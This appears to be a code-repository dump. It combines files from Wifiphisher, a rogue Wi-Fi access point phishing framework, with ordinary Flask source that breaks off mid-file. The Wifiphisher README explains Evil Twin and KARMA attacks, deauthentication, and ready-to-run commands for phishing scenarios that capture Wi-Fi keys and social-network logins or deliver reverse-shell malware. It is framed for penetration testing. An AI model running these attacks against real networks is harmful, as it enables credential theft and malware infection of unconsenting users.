WPA2/WPS and WPA/WPS """ encryption_info = packet.sprintf("%Dot11Beacon.cap%") elt_section = packet[dot11.Dot11Elt] encryption_type = None found_wps = False # extract information from packet try: while (isinstance(elt_section, dot11.Dot11Elt) or (not encryption_type and not found_wps)): # check if encryption type is WPA2 if elt_section.ID == 48: encryption_type = "WPA2" # check if encryption type is WPA elif (elt_section.ID == 221 and elt_section.info.startswith(b"\x00P\xf2\x01\x01\x00")): encryption_type = "WPA" # check if WPS IE exists if (elt_section.ID == 221 and elt_section.info.startswith(b"\x00P\xf2\x04")): found_wps = True # break down the packet elt_section = elt_section.payload # check to see if encryption type is either WEP or OPEN if not encryption_type: if "privacy" in encryption_info: encryption_type = "WEP" else: encryption_type = "OPEN" # Fixes #1146, #1155 except AttributeError: pass if encryption_type != "WEP" and found_wps: encryption_type += "/WPS" return encryption_type File: docs/conf.py # -*- coding: utf-8 -*- # # Configuration file for the Sphinx documentation builder. # # This file does only contain a selection of the most common options. 
For a # full list see the documentation: # http://www.sphinx-doc.org/en/stable/config # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # # import os # import sys # sys.path.insert(0, os.path.abspath('.')) # -- Project information ----------------------------------------------------- project = 'Wifiphisher' copyright = '2019, George Chatzisofroniou' author = 'George Chatzisofroniou' # The short X.Y version version = '' # The full version, including alpha/beta/rc tags release = '1.4' # -- General configuration --------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.viewcode', ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The master toctree document. master_doc = 'index' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path . exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' #html_theme = 'alabaster' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Custom sidebar templates, must be a dictionary that maps document names # to template names. # # The default sidebars (for documents that don't match any pattern) are # defined by theme itself. Builtin themes are using these templates by # default: ``['localtoc.html', 'relations.html', 'sourcelink.html', # 'searchbox.html']``. # # html_sidebars = {} # -- Options for HTMLHelp output --------------------------------------------- # Output file base name for HTML help builder. htmlhelp_basename = 'Wifiphisherdoc' # -- Options for LaTeX output ------------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. 
# # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'Wifiphisher.tex', 'Wifiphisher Documentation', 'George Chatzisofroniou', 'manual'), ] # -- Options for manual page output ------------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'wifiphisher', 'Wifiphisher Documentation', [author], 1) ] # -- Options for Texinfo output ---------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'Wifiphisher', 'Wifiphisher Documentation', author, 'Wifiphisher', 'One line description of project.', 'Miscellaneous'), ] # -- Extension configuration -------------------------------------------------
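The Sphinx configuration above drives both the HTML and the LaTeX/man/Texinfo builds of the documentation. As a minimal, hedged sketch (not part of the repository), the HTML docs could be built programmatically from the docs/ directory roughly as follows, assuming Sphinx and sphinx_rtd_theme are installed; the output path `_build/html` is only an illustrative choice:

```python
# Hedged sketch: build the HTML documentation using the conf.py above.
# Assumes this is run from the docs/ directory of a wifiphisher checkout
# and that Sphinx plus sphinx_rtd_theme are importable.
from sphinx.cmd.build import build_main

# Equivalent to running: sphinx-build -b html . _build/html
exit_code = build_main(["-b", "html", ".", "_build/html"])
print("Sphinx build finished with exit code", exit_code)
```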
[![Build Status](https://travis-ci.org/wifiphisher/wifiphisher.svg?branch=master)](https://travis-ci.org/wifiphisher/wifiphisher) [![Documentation Status](https://readthedocs.org/projects/wifiphisher/badge/?version=latest)](http://wifiphisher.readthedocs.io/en/latest/?badge=latest) ![Python Version](https://img.shields.io/badge/python-3.7-blue.svg) ![License](https://img.shields.io/badge/license-GPL-blue.svg) <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/wifiphisher.png" /></p> ## About <a href="https://wifiphisher.org">Wifiphisher</a> is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. Wifiphisher can be further used to mount victim-customized web phishing attacks against the connected clients in order to capture credentials (e.g. from third party login pages or WPA/WPA2 Pre-Shared Keys) or infect the victim stations with malwares. Wifiphisher is... * ...powerful. Wifiphisher can run for hours inside a Raspberry Pi device executing all modern Wi-Fi association techniques (including "Evil Twin", "KARMA" and "Known Beacons"). * ...flexible. Supports dozens of arguments and comes with a set of community-driven phishing templates for different deployment scenarios. * ...modular. Users can <a href="http://wifiphisher.readthedocs.io/en/latest/extensions.html">write simple or complicated modules</a> in Python to expand the functionality of the tool or <a href="http://wifiphisher.readthedocs.io/en/latest/custom_phishing_scenario.html">create custom phishing scenarios</a> in order to conduct specific target-oriented attacks. * ...easy to use. Advanced users can utilize the rich set of features that Wifiphisher offers but beginners may start out as simply as "./bin/wifiphisher". The interactive Textual User Interface guides the tester through the build process of the attack. * ...the result of an extensive research. Attacks like "Known Beacons" and "Lure10" as well as state-of-the-art phishing techniques, were disclosed by our developers, and Wifiphisher was the first tool to incorporate them. * ...supported by an awesome community of developers and users. * ...free. Wifiphisher is available for free download, and also comes with full source code that you may study, change, or distribute under the terms of the GPLv3 license. ## Sponsors Wifiphisher is free (as in speech, and as in beer) and will always be. Continuous development of the project would not be possible without our sponsors and supporters: <a href="https://www.tines.com/?utm_source=oss&utm_medium=sponsorship&utm_campaign=wifiphisher"><p align="center"><a href="https://www.tines.com/?utm_source=oss&utm_medium=sponsorship&utm_campaign=wifiphisher"><img src="https://wifiphisher.github.io/wifiphisher/tines_logo.png" /></a></p></a> ## How it works Wi-Fi phishing consists of two steps: 1. The first step involves the process of associating with Wi-Fi clients unknowingly, or in other words, obtaining a man-in-the-middle (MITM) position. Wifiphisher uses a number of different techniques to achieve this including: * Evil Twin, where Wifiphisher creates a fake wireless network that looks similar to a legitimate network. * KARMA, where Wifiphisher masquerades as a public network searched for by nearby Wi-Fi clients. 
* Known Beacons, where Wifiphisher broadcasts a dictionary of common ESSIDs, that the around wireless stations have likely connected to in the past. At the same time, Wifiphisher keeps forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations and eventually lure victims using the above techniques. <p align="center"><img width="70%" src="https://wifiphisher.github.io/wifiphisher/diagram.jpg" /><br /><i>Performing MiTM attack</i></p> 2. (Optionally) There are a number of different attacks that can be carried out once Wifiphisher grants the penetration tester with a man-in-the-middle position. For example, the tester may perform data sniffing or scan the victim stations for vulnerabilities. Using Wifiphisher, advanced web phishing techniques are possible by gathering information from the target environment and victim user. For example, in one of our scenarios, Wifiphisher will extract information from the broadcasted beacon frames and the HTTP User-Agent header to display a web-based imitation of Windows network manager in order to capture the Pre-Shared Key. <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss-webphishing.png" /><br /><i>Fake <a href="https://wifiphisher.org/ps/wifi_connect/">web-based network manager</a></i></p> ## Requirements Following are the requirements for getting the most out of Wifiphisher: - A working Linux system. People have made Wifiphisher work on many distros, but Kali Linux is the officially supported distribution, thus all new features are primarily tested on this platform. - One wireless network adapter that supports AP & Monitor mode and is capable of injection. Drivers should support netlink. ## Installation To install the latest development version type the following commands: ```bash git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision cd wifiphisher # Switch to tool's directory sudo python setup.py install # Install any dependencies ``` Alternatively, you can download the latest stable version from the <a href="https://github.com/wifiphisher/wifiphisher/releases">Releases page</a>. ## Usage Run the tool by typing `wifiphisher` or `python bin/wifiphisher` (from inside the tool's directory). By running the tool without any options, it will find the right interfaces and interactively ask the user to pick the ESSID of the target network (out of a list with all the ESSIDs in the around area) as well as a phishing scenario to perform. By default, the tool will perform both Evil Twin and KARMA attacks. *** ```shell wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap ``` Use wlan0 for spawning the rogue Access Point and wlan4 for DoS attacks. Select the target network manually from the list and perform the "Firmware Upgrade" scenario. Verify that the captured Pre-Shared Key is correct by checking it against the handshake in the handshake.pcap file. Useful for manually selecting the wireless adapters. The <a href="https://wifiphisher.org/ps/firmware-upgrade/">"Firmware Upgrade"</a> scenario is an easy way for obtaining the PSK from a password-protected network. *** ```shell wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd ``` Automatically pick the right interfaces. Target the Wi-Fi with ESSID "CONFERENCE_WIFI" and perform the "Plugin Update" scenario. The Evil Twin will be password-protected with PSK "s3cr3tp4ssw0rd". Useful against networks with disclosed PSKs (e.g. in conferences). 
The <a href="https://wifiphisher.org/ps/plugin_update/">"Plugin Update"</a> scenario provides an easy way for getting the victims to download malicious executables (e.g. malwares containing a reverse shell payload). *** ```shell wifiphisher --essid "FREE WI-FI" -p oauth-login -kB ``` Simply spawn an open Wi-Fi network with ESSID "FREE WI-FI" and perform the "OAuth Login" scenario. Furthermore, mount the "Known Beacons" Wi-Fi automatic association technique. Useful against victims in public areas. The <a href="https://wifiphisher.org/ps/oauth-login/">"OAuth Login"</a> scenario provides a simple way for capturing credentials from social networks, like Facebook. Following are all the options along with their descriptions (also available with `wifiphisher -h`): | Short form | Long form | Explanation | | :----------: | :---------: | :-----------: | |-h | --help| show this help message and exit | |-i INTERFACE| --interface INTERFACE| Manually choose an interface that supports both AP and monitor modes for spawning the rogue AP as well as mounting additional Wi-Fi attacks from Extensions (i.e. deauth). Example: -i wlan1 | |-eI EXTENSIONSINTERFACE| --extensionsinterface EXTENSIONSINTERFACE| Manually choose an interface that supports monitor mode for running the extensions. Example: -eI wlan1| |-aI APINTERFACE| --apinterface APINTERFACE| Manually choose an interface that supports AP mode for spawning an AP. Example: -aI wlan0| |-pI INTERFACE| --protectinterface INTERFACE| Specify one or more interfaces that will have their connection protected from being managed by NetworkManager.| |-kN| --keepnetworkmanager| Do not kill NetworkManager.| |-nE| --noextensions| Do not load any extensions.| |-e ESSID| --essid ESSID| Enter the ESSID of the rogue Access Point. This option will skip Access Point selection phase. Example: --essid 'Free WiFi'| |-pPD PHISHING_PAGES_DIRECTORY|--phishing-pages-directory PHISHING_PAGES_DIRECTORY| Search for phishing pages in this location| |-p PHISHINGSCENARIO| --phishingscenario PHISHINGSCENARIO |Choose the phishing scenario to run.This option will skip the scenario selection phase. Example: -p firmware_upgrade| |-pK PRESHAREDKEY| --presharedkey PRESHAREDKEY| Add WPA/WPA2 protection on the rogue Access Point. Example: -pK s3cr3tp4ssw0rd| |-qS| --quitonsuccess| Stop the script after successfully retrieving one pair of credentials.| |-lC| --lure10-capture| Capture the BSSIDs of the APs that are discovered during AP selection phase. This option is part of Lure10 attack. |-lE LURE10_EXPLOIT |--lure10-exploit LURE10_EXPLOIT| Fool the Windows Location Service of nearby Windows users to believe it is within an area that was previously captured with --lure10-capture. Part of the Lure10 attack.| |-iAM| --mac-ap-interface| Specify the MAC address of the AP interface. Example: -iAM 38:EC:11:00:00:00| |-iEM| --mac-extensions-interface| Specify the MAC address of the extensions interface. Example: -iEM E8:2A:EA:00:00:00| |-iNM| --no-mac-randomization| Do not change any MAC address.| |-hC|--handshake-capture|Capture of the WPA/WPA2 handshakes for verifying passphrase. Requires cowpatty. Example: -hC capture.pcap| |-dE ESSID|--deauth-essid ESSID|Deauth all the BSSIDs in the WLAN with that ESSID.| |-dC CHANNELS| --deauth-channels CHANNELS|Channels to deauth. Example: --deauth-channels 1,3,7| ||--logging| Enable logging. 
Output will be saved to wifiphisher.log file.| |-lP LOGPATH| --logpath LOGPATH| Determine the full path of the logfile.| |-cP CREDENTIAL_LOG_PATH|--credential-log-path CREDENTIAL_LOG_PATH|Determine the full path of the file that will store any captured credentials| |-cM|--channel-monitor|Monitor if the target access point changes the channel.| ||--payload-path| Enable the payload path. Intended for use with scenarios that serve payloads.| |-wP|--wps-pbc|Monitor if the button on a WPS-PBC Registrar side is pressed.| |-wAI|--wpspbc-assoc-interface|The WLAN interface used for associating to the WPS AccessPoint.| |-kB|--known-beacons|Perform the known beacons Wi-Fi automatic association technique.| |-fH|--force-hostapd|Force the usage of hostapd installed in the system.| ||--dnsmasq-conf DNSMASQ_CONF|Determine the full path of dnmasq.conf file.| |-dK|--disable-karma|Disables KARMA attack.| |-pE|--phishing-essid|Determine the ESSID you want to use for the phishing page.| ## Screenshots <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss5.png" /><br /><i>Targeting an access point</i></p> <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss2.png" /><br /><i>A successful attack</i></p> <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss7.png" /><br /><i>Fake <a href="https://wifiphisher.org/ps/firmware-upgrade/">router configuration page</a></i></p> <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss6.png" /><br /><i>Fake <a href="https://wifiphisher.org/ps/oauth-login/">OAuth Login Page</a></i></p> <p align="center"><img src="https://wifiphisher.github.io/wifiphisher/ss4.png" /><br /><i>Fake <a href="https://wifiphisher.org/ps/wifi_connect/">web-based network manager</a></i></p> ## Help needed If you are a Python developer or a web designer you can help us improve Wifiphisher. Feel free to take a look at the <a href="https://github.com/wifiphisher/wifiphisher/issues">bug tracker</a> for some tasks to do. If you don't know how to code, you can help us by <a href="https://github.com/wifiphisher/wifiphisher/issues">proposing improvements or reporting bugs</a>. Please have a look at the Bug Reporting Guidelines and the <a href="https://wifiphisher.readthedocs.io/en/latest/faq.html">FAQ document</a> beforehand. Note that the tool does not aim to be script-kiddie friendly. Make sure you do understand how the tool works before opening an issue. ## Credits The script is based on an idea from <a href="https://github.com/DanMcInerney">Dan McInerney</a> back in 2015. A full list of contributors lies <a href="https://github.com/wifiphisher/wifiphisher/graphs/contributors">here</a>. ## License Wifiphisher is licensed under the GPLv3 license. See [LICENSE](LICENSE) for more information. ## Project Status Wifiphisher's current version is **1.4**. You can download the latest release from <a href="https://github.com/wifiphisher/wifiphisher/releases/tag/v1.4">here</a>. Otherwise you can get the latest development version by cloning this repository. ## Disclaimer * Usage of Wifiphisher for attacking infrastructures without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program. <b>Note</b>: Be aware of sites pretending to be related with the Wifiphisher Project. They may be delivering malware. 
For Wifiphisher news, follow us on <a href="https://www.twitter.com/wifiphisher">Twitter</a> or like us on <a href="https://www.facebook.com/Wifiphisher-129914317622032/">Facebook</a>.
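Looking back at wifiphisher/common/phishingpage.py earlier in this entry, a short, hedged usage sketch of the template classes (not part of the project, and assuming wifiphisher is installed with its bundled phishing pages in place) could look like this:

```python
# Hedged sketch only: enumerate the available phishing scenarios through the
# classes defined in wifiphisher/common/phishingpage.py.
from wifiphisher.common.phishingpage import TemplateManager

manager = TemplateManager()  # scans the default phishing pages directory
for name, template in manager.get_templates().items():
    print(name, "->", template.get_display_name())
    print("   ", template.get_description())
    if template.has_payload():
        print("    serves a payload from", template.get_payload_path())
manager.on_exit()  # removes any extra files copied into the templates
```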
flask
2fec0b206c6e83ea813ab26597e15c96fab08be7
File: docs/conf.py import packaging.version from pallets_sphinx_themes import get_version from pallets_sphinx_themes import ProjectLink # Project -------------------------------------------------------------- project = "Flask" copyright = "2010 Pallets" author = "Pallets" release, version = get_version("Flask") # General -------------------------------------------------------------- default_role = "code" extensions = [ "sphinx.ext.autodoc", "sphinx.ext.extlinks", "sphinx.ext.intersphinx", "sphinxcontrib.log_cabinet", "sphinx_tabs.tabs", "pallets_sphinx_themes", ] autodoc_member_order = "bysource" autodoc_typehints = "description" autodoc_preserve_defaults = True extlinks = { "issue": ("https://github.com/pallets/flask/issues/%s", "#%s"), "pr": ("https://github.com/pallets/flask/pull/%s", "#%s"), } intersphinx_mapping = { "python": ("https://docs.python.org/3/", None), "werkzeug": ("https://werkzeug.palletsprojects.com/", None), "click": ("https://click.palletsprojects.com/", None), "jinja": ("https://jinja.palletsprojects.com/", None), "itsdangerous": ("https://itsdangerous.palletsprojects.com/", None), "sqlalchemy": ("https://docs.sqlalchemy.org/", None), "wtforms": ("https://wtforms.readthedocs.io/", None), "blinker": ("https://blinker.readthedocs.io/", None), } # HTML ----------------------------------------------------------------- html_theme = "flask" html_theme_options = {"index_sidebar_logo": False} html_context = { "project_links": [ ProjectLink("Donate", "https://palletsprojects.com/donate"), ProjectLink("PyPI Releases", "https://pypi.org/project/Flask/"), ProjectLink("Source Code", "https://github.com/pallets/flask/"), ProjectLink("Issue Tracker", "https://github.com/pallets/flask/issues/"), ProjectLink("Chat", "https://discord.gg/pallets"), ] } html_sidebars = { "index": ["project.html", "localtoc.html", "searchbox.html", "ethicalads.html"], "**": ["localtoc.html", "relations.html", "searchbox.html", "ethicalads.html"], } singlehtml_sidebars = {"index": ["project.html", "localtoc.html", "ethicalads.html"]} html_static_path = ["_static"] html_favicon = "_static/shortcut-icon.png" html_logo = "_static/flask-vertical.png" html_title = f"Flask Documentation ({version})" html_show_sourcelink = False # Local Extensions ----------------------------------------------------- def github_link(name, rawtext, text, lineno, inliner, options=None, content=None): app = inliner.document.settings.env.app release = app.config.release base_url = "https://github.com/pallets/flask/tree/" if text.endswith(">"): words, text = text[:-1].rsplit("<", 1) words = words.strip() else: words = None if packaging.version.parse(release).is_devrelease: url = f"{base_url}main/{text}" else: url = f"{base_url}{release}/{text}" if words is None: words = url from docutils.nodes import reference from docutils.parsers.rst.roles import set_classes options = options or {} set_classes(options) node = reference(rawtext, words, refuri=url, **options) return [node], [] def setup(app): app.add_role("gh", github_link) File: src/flask/logging.py from __future__ import annotations import logging import sys import typing as t from werkzeug.local import LocalProxy from .globals import request if t.TYPE_CHECKING: # pragma: no cover from .sansio.app import App @LocalProxy def wsgi_errors_stream() -> t.TextIO: """Find the most appropriate error stream for the application. If a request is active, log to ``wsgi.errors``, otherwise use ``sys.stderr``. 
If you configure your own :class:`logging.StreamHandler`, you may want to use this for the stream. If you are using file or dict configuration and can't import this directly, you can refer to it as ``ext://flask.logging.wsgi_errors_stream``. """ if request: return request.environ["wsgi.errors"] # type: ignore[no-any-return] return sys.stderr def has_level_handler(logger: logging.Logger) -> bool: """Check if there is a handler in the logging chain that will handle the given logger's :meth:`effective level <~logging.Logger.getEffectiveLevel>`. """ level = logger.getEffectiveLevel() current = logger while current: if any(handler.level <= level for handler in current.handlers): return True if not current.propagate: break current = current.parent # type: ignore return False #: Log messages to :func:`~flask.logging.wsgi_errors_stream` with the format #: ``[%(asctime)s] %(levelname)s in %(module)s: %(message)s``. default_handler = logging.StreamHandler(wsgi_errors_stream) # type: ignore default_handler.setFormatter( logging.Formatter("[%(asctime)s] %(levelname)s in %(module)s: %(message)s") ) def create_logger(app: App) -> logging.Logger: """Get the Flask app's logger and configure it if needed. The logger name will be the same as :attr:`app.import_name <flask.Flask.name>`. When :attr:`~flask.Flask.debug` is enabled, set the logger level to :data:`logging.DEBUG` if it is not set. If there is no handler for the logger's effective level, add a :class:`~logging.StreamHandler` for :func:`~flask.logging.wsgi_errors_stream` with a basic format. """ logger = logging.getLogger(app.name) if app.debug and not logger.level: logger.setLevel(logging.DEBUG) if not has_level_handler(logger): logger.addHandler(default_handler) return logger File: src/flask/signals.py from __future__ import annotations from blinker import Namespace # This namespace is only for signals provided by Flask itself. _signals = Namespace() template_rendered = _signals.signal("template-rendered") before_render_template = _signals.signal("before-render-template") request_started = _signals.signal("request-started") request_finished = _signals.signal("request-finished") request_tearing_down = _signals.signal("request-tearing-down") got_request_exception = _signals.signal("got-request-exception") appcontext_tearing_down = _signals.signal("appcontext-tearing-down") appcontext_pushed = _signals.signal("appcontext-pushed") appcontext_popped = _signals.signal("appcontext-popped") message_flashed = _signals.signal("message-flashed") File: src/flask/sessions.py from __future__ import annotations import hashlib import typing as t from collections.abc import MutableMapping from datetime import datetime from datetime import timezone from itsdangerous import BadSignature from itsdangerous import URLSafeTimedSerializer from werkzeug.datastructures import CallbackDict from .json.tag import TaggedJSONSerializer if t.TYPE_CHECKING: # pragma: no cover import typing_extensions as te from .app import Flask from .wrappers import Request from .wrappers import Response # TODO generic when Python > 3.8 class SessionMixin(MutableMapping): # type: ignore[type-arg] """Expands a basic dictionary with session attributes.""" @property def permanent(self) -> bool: """This reflects the ``'_permanent'`` key in the dict.""" return self.get("_permanent", False) @permanent.setter def permanent(self, value: bool) -> None: self["_permanent"] = bool(value) #: Some implementations can detect whether a session is newly #: created, but that is not guaranteed. Use with caution. 
The mixin # default is hard-coded ``False``. new = False #: Some implementations can detect changes to the session and set #: this when that happens. The mixin default is hard coded to #: ``True``. modified = True #: Some implementations can detect when session data is read or #: written and set this when that happens. The mixin default is hard #: coded to ``True``. accessed = True # TODO generic when Python > 3.8 class SecureCookieSession(CallbackDict, SessionMixin): # type: ignore[type-arg] """Base class for sessions based on signed cookies. This session backend will set the :attr:`modified` and :attr:`accessed` attributes. It cannot reliably track whether a session is new (vs. empty), so :attr:`new` remains hard coded to ``False``. """ #: When data is changed, this is set to ``True``. Only the session #: dictionary itself is tracked; if the session contains mutable #: data (for example a nested dict) then this must be set to #: ``True`` manually when modifying that data. The session cookie #: will only be written to the response if this is ``True``. modified = False #: When data is read or written, this is set to ``True``. Used by # :class:`.SecureCookieSessionInterface` to add a ``Vary: Cookie`` #: header, which allows caching proxies to cache different pages for #: different users. accessed = False def __init__(self, initial: t.Any = None) -> None: def on_update(self: te.Self) -> None: self.modified = True self.accessed = True super().__init__(initial, on_update) def __getitem__(self, key: str) -> t.Any: self.accessed = True return super().__getitem__(key) def get(self, key: str, default: t.Any = None) -> t.Any: self.accessed = True return super().get(key, default) def setdefault(self, key: str, default: t.Any = None) -> t.Any: self.accessed = True return super().setdefault(key, default) class NullSession(SecureCookieSession): """Class used to generate nicer error messages if sessions are not available. Will still allow read-only access to the empty session but fail on setting. """ def _fail(self, *args: t.Any, **kwargs: t.Any) -> t.NoReturn: raise RuntimeError( "The session is unavailable because no secret " "key was set. Set the secret_key on the " "application to something unique and secret." ) __setitem__ = __delitem__ = clear = pop = popitem = update = setdefault = _fail # type: ignore # noqa: B950 del _fail class SessionInterface: """The basic interface you have to implement in order to replace the default session interface which uses werkzeug's securecookie implementation. The only methods you have to implement are :meth:`open_session` and :meth:`save_session`, the others have useful defaults which you don't need to change. The session object returned by the :meth:`open_session` method has to provide a dictionary like interface plus the properties and methods from the :class:`SessionMixin`. We recommend just subclassing a dict and adding that mixin:: class Session(dict, SessionMixin): pass If :meth:`open_session` returns ``None`` Flask will call into :meth:`make_null_session` to create a session that acts as replacement if the session support cannot work because some requirement is not fulfilled. The default :class:`NullSession` class that is created will complain that the secret key was not set. To replace the session interface on an application all you have to do is to assign :attr:`flask.Flask.session_interface`:: app = Flask(__name__) app.session_interface = MySessionInterface() Multiple requests with the same session may be sent and handled concurrently. 
When implementing a new session interface, consider whether reads or writes to the backing store must be synchronized. There is no guarantee on the order in which the session for each request is opened or saved, it will occur in the order that requests begin and end processing. .. versionadded:: 0.8 """ #: :meth:`make_null_session` will look here for the class that should #: be created when a null session is requested. Likewise the #: :meth:`is_null_session` method will perform a typecheck against #: this type. null_session_class = NullSession #: A flag that indicates if the session interface is pickle based. #: This can be used by Flask extensions to make a decision in regards #: to how to deal with the session object. #: #: .. versionadded:: 0.10 pickle_based = False def make_null_session(self, app: Flask) -> NullSession: """Creates a null session which acts as a replacement object if the real session support could not be loaded due to a configuration error. This mainly aids the user experience because the job of the null session is to still support lookup without complaining but modifications are answered with a helpful error message of what failed. This creates an instance of :attr:`null_session_class` by default. """ return self.null_session_class() def is_null_session(self, obj: object) -> bool: """Checks if a given object is a null session. Null sessions are not asked to be saved. This checks if the object is an instance of :attr:`null_session_class` by default. """ return isinstance(obj, self.null_session_class) def get_cookie_name(self, app: Flask) -> str: """The name of the session cookie. Uses``app.config["SESSION_COOKIE_NAME"]``.""" return app.config["SESSION_COOKIE_NAME"] # type: ignore[no-any-return] def get_cookie_domain(self, app: Flask) -> str | None: """The value of the ``Domain`` parameter on the session cookie. If not set, browsers will only send the cookie to the exact domain it was set from. Otherwise, they will send it to any subdomain of the given value as well. Uses the :data:`SESSION_COOKIE_DOMAIN` config. .. versionchanged:: 2.3 Not set by default, does not fall back to ``SERVER_NAME``. """ return app.config["SESSION_COOKIE_DOMAIN"] # type: ignore[no-any-return] def get_cookie_path(self, app: Flask) -> str: """Returns the path for which the cookie should be valid. The default implementation uses the value from the ``SESSION_COOKIE_PATH`` config var if it's set, and falls back to ``APPLICATION_ROOT`` or uses ``/`` if it's ``None``. """ return app.config["SESSION_COOKIE_PATH"] or app.config["APPLICATION_ROOT"] # type: ignore[no-any-return] def get_cookie_httponly(self, app: Flask) -> bool: """Returns True if the session cookie should be httponly. This currently just returns the value of the ``SESSION_COOKIE_HTTPONLY`` config var. """ return app.config["SESSION_COOKIE_HTTPONLY"] # type: ignore[no-any-return] def get_cookie_secure(self, app: Flask) -> bool: """Returns True if the cookie should be secure. This currently just returns the value of the ``SESSION_COOKIE_SECURE`` setting. """ return app.config["SESSION_COOKIE_SECURE"] # type: ignore[no-any-return] def get_cookie_samesite(self, app: Flask) -> str | None: """Return ``'Strict'`` or ``'Lax'`` if the cookie should use the ``SameSite`` attribute. This currently just returns the value of the :data:`SESSION_COOKIE_SAMESITE` setting. 
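# Illustrative only: the cookie getters above read plain config keys, so a
# typical hardening setup is just configuration (the values are examples, not
# recommendations for every deployment).
from flask import Flask

app = Flask(__name__)
app.config.update(
    SESSION_COOKIE_NAME="session",
    SESSION_COOKIE_SECURE=True,     # only send the cookie over HTTPS
    SESSION_COOKIE_HTTPONLY=True,   # keep it out of reach of JavaScript
    SESSION_COOKIE_SAMESITE="Lax",  # or "Strict"
)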
""" return app.config["SESSION_COOKIE_SAMESITE"] # type: ignore[no-any-return] def get_expiration_time(self, app: Flask, session: SessionMixin) -> datetime | None: """A helper method that returns an expiration date for the session or ``None`` if the session is linked to the browser session. The default implementation returns now + the permanent session lifetime configured on the application. """ if session.permanent: return datetime.now(timezone.utc) + app.permanent_session_lifetime return None def should_set_cookie(self, app: Flask, session: SessionMixin) -> bool: """Used by session backends to determine if a ``Set-Cookie`` header should be set for this session cookie for this response. If the session has been modified, the cookie is set. If the session is permanent and the ``SESSION_REFRESH_EACH_REQUEST`` config is true, the cookie is always set. This check is usually skipped if the session was deleted. .. versionadded:: 0.11 """ return session.modified or ( session.permanent and app.config["SESSION_REFRESH_EACH_REQUEST"] ) def open_session(self, app: Flask, request: Request) -> SessionMixin | None: """This is called at the beginning of each request, after pushing the request context, before matching the URL. This must return an object which implements a dictionary-like interface as well as the :class:`SessionMixin` interface. This will return ``None`` to indicate that loading failed in some way that is not immediately an error. The request context will fall back to using :meth:`make_null_session` in this case. """ raise NotImplementedError() def save_session( self, app: Flask, session: SessionMixin, response: Response ) -> None: """This is called at the end of each request, after generating a response, before removing the request context. It is skipped if :meth:`is_null_session` returns ``True``. """ raise NotImplementedError() session_json_serializer = TaggedJSONSerializer() def _lazy_sha1(string: bytes = b"") -> t.Any: """Don't access ``hashlib.sha1`` until runtime. FIPS builds may not include SHA-1, in which case the import and use as a default would fail before the developer can configure something else. """ return hashlib.sha1(string) class SecureCookieSessionInterface(SessionInterface): """The default session interface that stores sessions in signed cookies through the :mod:`itsdangerous` module. """ #: the salt that should be applied on top of the secret key for the #: signing of cookie based sessions. salt = "cookie-session" #: the hash function to use for the signature. The default is sha1 digest_method = staticmethod(_lazy_sha1) #: the name of the itsdangerous supported key derivation. The default #: is hmac. key_derivation = "hmac" #: A python serializer for the payload. The default is a compact #: JSON derived serializer with support for some extra Python types #: such as datetime objects or tuples. 
